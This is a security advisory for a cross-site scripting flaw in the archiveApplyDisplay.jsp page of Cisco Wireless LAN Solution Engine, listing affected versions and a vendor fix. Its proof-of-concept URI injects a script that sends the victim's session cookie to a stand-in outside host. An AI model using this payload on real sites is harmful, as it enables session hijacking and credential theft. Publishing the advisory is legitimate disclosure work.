Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability

Bugtraq ID:	17604
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Apr 19 2006 12:00AM
Updated:	Apr 19 2006 12:00AM
Credit:	Adam Pointon of Assurance.com.au is credited with the discovery of this vulnerability.
Vulnerable:	Cisco Wireless Lan Solution Engine Express 0 Cisco Wireless Lan Solution Engine 1130 2.0.5 Cisco Wireless Lan Solution Engine 1130 2.0 .2 Cisco Wireless Lan Solution Engine 1130 2.0 Cisco Wireless Lan Solution Engine 1105 2.5 Cisco Wireless Lan Solution Engine 1105 2.0.2 Cisco Wireless Lan Solution Engine 1105 2.0 Cisco Wireless Lan Solution Engine
Not Vulnerable:	Cisco Wireless Lan Solution Engine Express 2.13 Cisco Wireless Lan Solution Engine 2.13

Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability

CiscoWorks Wireless LAN Solution Engine (WLSE) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal JSP session cookie-based authentication credentials and launch other attacks.

Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability

This issue can be exploited through use of a web client.

The following proof of concept URI is available:
http://www.example.com/wlse/configure/archive/archiveApplyDisplay.jsp?displayMsg=<script>document.location='http://www.example2.com?'+document.cookie</script>

Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability

Solution:
The vendor has released version 2.13 of the affected software to address this issue. Please see the referenced vendor advisory for details on obtaiing the appropriate updates.

Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability

References:

• Cisco Call Manager Express (Cisco Systems)
  
• Cisco Security Advisory: Multiple Vulnerabilities in the WLSE Appliance (Cisco)
  
• Cisco Security Response: Response to Privilege Escalation on Multiple Cisco Prod (Cisco)
  
• Multiple vulnerabilities in Linux based Cisco products (assurance.com.au)
  
• Re: Multiple vulnerabilities in Linux based Cisco products (Cisco)